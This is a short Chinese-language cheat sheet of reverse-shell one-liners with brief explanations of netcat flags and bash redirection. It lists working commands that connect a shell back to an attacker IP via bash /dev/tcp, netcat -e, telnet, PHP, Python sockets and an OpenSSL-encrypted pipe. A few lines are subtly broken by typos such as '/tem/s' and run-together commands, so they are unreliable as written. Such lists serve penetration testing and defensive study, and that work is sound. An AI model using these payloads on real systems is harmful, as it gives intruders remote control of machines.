各种反弹shell原理

nc -lvp 4444
l：代表入站监听v：代表输出信息级别p：代表监听的端口

bash -i >& /dev/tcp/192.168.0.1/4444 0>&1
bash -i：打开一个交互式的bash>&：将标准错误输出合并并重定向到标准输出，也可以写成&>/dev/tcp/192.168.0.1/4444：调用socket，建立socket连接，其中192.168.0.1为要反弹的主机IP，4444为端口0>&1：标准输入重定向到标准输出，实现你与反弹出来的shell的交互，可以接受用户输入，0>&1和0<&1作用相同
/dev/tcp 说Linux的一个特殊设备，打开这个文件就相当于发出了一个socket调用，建立一个socket连接，读写这个文件就相当于在这个bash命令行的过程中。
三种输入输出的状况：标准输入：代码为0；或称为stdin；使用的方式为<标准输出：代码为1；或称为stdout；使用方式为1>错误输出：代码为2；或称为stderr；使用方式为2>

exec 5<> /dev/tcp/192.168.0.1/4444; cat <&5 | while read line; do $line 2>&5 >&5; done

exec 0&0 2>&0 0<&196;exec 196<>/dev/tcp/192.168.0.1/4444; sh <&196 >&196 2>&196 

nc -lvp 4444

nc -e /bin/bash 192.168.0.1 4444

nc -lvp 4444nc -lvp 5555

telnet 192.168.0.1 4444 | /bin/bash | telnet 192.168.0.1 5555

php -r '$sock=fsockopen("172.16.1.130",4444);exec("/bin/sh -i <&3 >&3 2>&3");'

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM); s.connect(("172.16.1.130",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);'

openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes
国家代码输入cn

openssl s_server -quiet -key key.pem -cert.pem -port 4444

mkfifo /tem/s; /bin/bash -i < /tem/s 2>&1 | openssl s_client -quiet -connect 192.168.0.1:4444